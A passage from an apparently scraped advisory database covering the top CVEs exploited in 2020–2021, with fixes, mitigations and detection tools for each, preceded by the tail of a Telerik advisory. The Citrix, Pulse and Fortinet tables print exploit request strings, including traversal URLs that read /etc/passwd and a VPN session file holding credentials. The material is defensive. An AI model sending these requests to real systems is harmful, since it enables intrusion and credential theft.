**REFERENCES**\n\n[1] [Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization> \"Allows JavaScriptSerializer Deserialization\" )\n\n[2] _[Exploit Database: Proof-of-Concept Exploit for CVE-2017-9248](<https://www.exploit-db.com/exploits/43873>)_\n\n[3] [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors> \"Advisory 2020-004: Remote code execution vulnerability being actively exploited in vulnerable versions of Telerik UI by sophisticated actors\" )\n\n[4] [Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI\" )\n\n[5] [Volexity Threat Research: XE Group](<https://www.volexity.com/blog/2021/12/07/xe-group-exposed-8-years-of-hacking-card-skimming-for-profit/> \"XE Group \u2013 Exposed: 8 Years of Hacking & Card Skimming for Profit\" )\n\n[6] [GitHub: Proof-of-Concept Exploit for CVE-2019-18935](<https://github.com/noperator/CVE-2019-18935/blob/master/CVE-2019-18935.py> \"noperator / CVE-2019-18935\" )\n\n[7] [Microsoft: Configure Logging in IIS](<https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis> \"Configure Logging in IIS\" )\n\n[8] [GitHub: CVE-2019-18935](<https://github.com/noperator/CVE-2019-18935> \"noperator / CVE-2019-18935\" )\n\n#### **ACKNOWLEDGEMENTS**\n\nGoogle\u2019s Threat Analysis Group (TAG) contributed to this CSA.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-15T12:00:00", "type": "ics", "title": "Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248", "CVE-2019-18935", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2023-06-15T12:00:00", "id": "AA23-074A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:07:27", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). \n\nThis advisory provides details on the top 30 vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021. \n\nCyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Key Findings\n\nIn 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.\n\n**Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. **Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.\n\nCISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. \n\n_Table 1:Top Routinely Exploited CVEs in 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nType \n \n---|---|--- \n \nCitrix\n\n| \n\nCVE-2019-19781\n\n| \n\narbitrary code execution \n \nPulse\n\n| \n\nCVE 2019-11510\n\n| \n\narbitrary file reading \n \nFortinet\n\n| \n\nCVE 2018-13379\n\n| \n\npath traversal \n \nF5- Big IP\n\n| \n\nCVE 2020-5902\n\n| \n\nremote code execution (RCE) \n \nMobileIron\n\n| \n\nCVE 2020-15505\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2017-11882\n\n| \n\nRCE \n \nAtlassian\n\n| \n\nCVE-2019-11580\n\n| \n\nRCE \n \nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nRCE \n \nTelerik\n\n| \n\nCVE 2019-18935\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2019-0604\n\n| \n\nRCE \n \nMicrosoft\n\n| \n\nCVE-2020-0787\n\n| \n\nelevation of privilege \n \nMicrosoft\n\n| \n\nCVE-2020-1472\n\n| \n\nelevation of privilege \n \nIn 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.\n\nCISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \n\nOrganizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.\n\n### 2020 CVEs\n\nCISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE 2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[[1](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)][[2](<https://media.defense.gov/2021/May/07/2002637232/-1/-1/0/ADVISORY%20FURTHER%20TTPS%20ASSOCIATED%20WITH%20SVR%20CYBER%20ACTORS.PDF>)][[3](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis.CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix\u2019s Application Delivery Controller (ADC)\u2014a load balancing application for web, application, and database servers widely use throughout the United States.[[4](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)][[5](<https://www.ncsc.gov.uk/news/citrix-alert>)] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)] \n\nIdentified as emerging targets in early 2020,[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[[8](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)][[9](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)], in VPN services[[10](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)][[11](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[[12]](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)[[13](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)]\n\nThe CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and retain unauthorized credentials for all users on a compromised Pulse VPN server and can retain unauthorize access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[[14](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[15](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[16](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)][[17](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)]\n\n### 2021 CVEs\n\nIn 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. \n\n * **Microsoft Exchange: **CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 \n * See CISA\u2019s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.\n * **Pulse Secure:** CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900 \n * See CISA\u2019s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.\n * **Accellion:** CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104 \n * See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.\n * **VMware:** CVE-2021-21985 \n * See CISA\u2019s Current Activity: Unpatched VMware vCenter Software for more information and guidance. \n * **Fortinet:** CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 \n * See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. \n\n### Mitigations and Indicators of Compromise\n\nOne of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. \n\nFocusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries\u2019 operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. \n\nAdditionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n\nTables 2\u201314 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. \n\n**Note:** The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE. \n\n\n_Table 2: CVE-2019-19781 Vulnerability Details_\n\n**Citrix Netscaler Directory Traversal (CVE-2019-19781)** \n \n--- \n \n_**Vulnerability Description**_ \nCitrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. \n\n| \n\n_**CVSS 3.02**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (`newbm.pl`) that, when accessed via `HTTP POST` request (`POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl`), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g.,` curl`, `wget`, `Invoke-WebRequest`) and gain unauthorized access to the OS. \n\n_Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n**_Recommended Mitigations_**\n\n * Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781\n * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list). \n \n_**Detection Methods**_\n\n * CISA has developed a free detection tool for this vulnerability: [cisagov/check-cve-2019-19781](<https://github.com/cisagov/check-cve-2019-19781>): Test a host for susceptibility to CVE-2019-19781.\n * Nmap developed a script that can be used with the port scanning engine: [CVE-2019-19781 - Citrix ADC Path Traversal #1893](<https://github.com/nmap/nmap/pull/1893/files>).\n * Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: [Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781>).\n * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n**_Vulnerable Technologies and Versions_** \nCitrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 \n \n_**References and Additional Guidance**_\n\n * [Citrix Blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n * [National Institute for Standards and Technology (NIST) National Vulnerability Database (NVD): Vulnerability Detail CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [Tripwire Vulnerability and Exposure Research Team (VERT) Article: Citrix NetScaler CVE-2019-19781: What You Need to Know](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>)\n * [National Security Agency Cybersecurity Advisory: Critical Vulnerability In Citrix Application Delivery Controller (ADC) And Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * [CISA Alert: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * [NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n * [CISA-NCSC Joint Cybersecurity Advisory: COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)\n * [CISA Alert: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders ](<https://www.ic3.gov/Media/News/2021/210426.pdf>)\n * [DoJ: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)\n * [GitHub: nsacyber / Mitigating Web Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_Table 3: CVE 2019-11510 Vulnerability Details_\n\nPulse Secure Connect VPN (CVE 2019-11510) \n--- \n \n_**Vulnerability Description**_ \nPulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials. \n\n| \n\n**CVSS 3.0**\n\nCritical \n \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nImproper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as `https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/` to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN. This could lead to anyone connecting to the VPN as a potential target to compromise. \n\n_Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n \n_**Recommended Mitigations**_\n\n * Upgrade to the latest Pulse Secure VPN.\n * Stay alert to any scheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read local system files. \n**_Detection Methods_**\n\n * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisagov/check-your-pulse.\n * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708. \n \n_**Vulnerable Technologies and Versions**_ \nPulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n * [Pulse Security Advisory: SA44101 \u2013 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [GitHub: cisagov / Check Your Pulse](<https://github.com/cisagov/check-your-pulse>)\n * [CISA Analysis Report: Federal Agency Compromised by Malicious Cyber Actor](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>)\n * [CISA Alert: Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [DoJ Press Release: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>) \n \n_Table 4: CVE 2018-13379 Vulnerability Details_\n\n**Fortinet FortioOS Secure Socket Layer VPN (CVE 2018-13379)** \n--- \n \n**_Vulnerability Description_** \nFortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the `sslvpn_websession` file. An attacker is then able to exact clear-text usernames and passwords. \n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n \n**_Vulnerability Discussion, IOCs, and Malware Campaigns_** \nWeakness in user access controls and web application directory structure allows attackers to read system files without authentication. Attackers are able to perform a `HTTP GET request http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession`. This results the server responding with unprintable/hex characters alongside cleartext credential information. \n\n_Multiple malware campaigns have taken advantage of this vulnerability. The most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo). _\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n \n \n**_Recommended Mitigations_**\n\n * Upgrade to the latest Fortinet SSL VPN. \n * Monitor for alerts to any unscheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read the `sslvpn_websessions` file. \n**_Detection Methods_**\n\n * Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709. \n \n**_Vulnerable Technologies and Versions_** \nFortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable. \n \n_**References**_\n\n * [FortiOS System File Leak Through SSL VPN via Specialty Crafted HTTP Resource Requests](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [Github: Fortinet Ssl Vpn Cve-2018-13379 Vuln Scanner #1709](<https://github.com/nmap/nmap/pull/1709>)\n * [Fortinet Blog: Update Regarding CVE-2018-13379](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\n * [NIST NVD Vulnerability Detail: CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [FBI-CISA Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) \n \n_Table 5: CVE-2020-5902 Vulnerability Details_\n\nF5 Big IP Traffic Management User Interface (CVE-2020-5902) \n--- \n \n_**Vulnerability Description**_ \nThe Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. \n\n| \n\n_**CVSS 3.0**_ \nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nThis vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. \n\n| _**Fix**_ \n[Upgrade to Secure Versions Available](<https://support.f5.com/csp/article/K52145254>) \n \n \n_**Recommended Mitigations**_ \nDownload and install a fixed software version of the software from a vendor approved resource. If it is not possible to update quickly, restrict access via the following actions.\n\n * Address unauthenticated and authenticated attackers on self IPs by blocking all access.\n * Address unauthenticated attackers on management interface by restricting access. \n**_Detection Methods_**\n\n * F5 developed a free detection tool for this vulnerability: [f5devcentral / cve-2020-5902-ioc-bigip-checker](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>). \n * Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_ \nBIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable. \n \n**_References_**\n\n * [F5 Article: TMUI RCE Vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\n * [NIST NVD Vulnerability Detail: CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n * [CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n * [MITRE CVE Record: CVE-2020-5902](<https://vulners.com/cve/CVE-2020-5902>) \n \n_Table 6: CVE-2020-15505 Vulnerability Details_\n\nMobileIron Core & Connector (CVE-2020-15505) \n--- \n \n_**Vulnerability Description**_\n\nMobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nCVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\nMultiple APTs have been observed exploiting this vulnerability to gain unauthorized access.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * None. Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\nMobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable. \n \n_**References**_\n\n * [Ivanti Blog: MobileIron Security Updates Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [NIST NVD Vulnerability Detail: CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * [MITRE CVE Record: CVE-2020-15505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15505>)\n * [NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) \n \n_Table 7: CVE-2020-0688 Vulnerability Details_\n\nMicrosoft Exchange Memory Corruption (CVE-2020-0688) \n--- \n \n_**Vulnerability Description**_\n\nAn RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \nVulnerability Discussion, IOCs, and Malware Campaigns \nCVE-2020-0688 exists in the Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as `SYSTEM`. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install. \n\nA nation-state _APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2020-0688 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at 